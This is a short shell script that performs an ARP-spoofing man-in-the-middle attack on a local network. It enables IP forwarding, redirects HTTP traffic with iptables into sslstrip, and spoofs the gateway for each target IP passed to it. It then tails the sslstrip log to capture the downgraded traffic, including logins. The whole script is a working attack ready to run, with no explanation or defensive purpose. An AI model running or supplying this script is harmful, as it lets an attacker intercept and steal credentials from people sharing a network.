#!/bin/sh

# Activate ip forward
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# Redirect 80 to 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT \
    --to-port 10000

# Initiate sslstrip
sudo sslstrip -l 10000 &

for ip in $@ ; do
    # Start spoofing
    echo arpspoof -i wlp2s0 -t $ip ${ip%.*}.1
    sudo arpspoof -i wlp2s0 -t $ip ${ip%.*}.1 2>/dev/null &
done

tail -f sslstrip.log
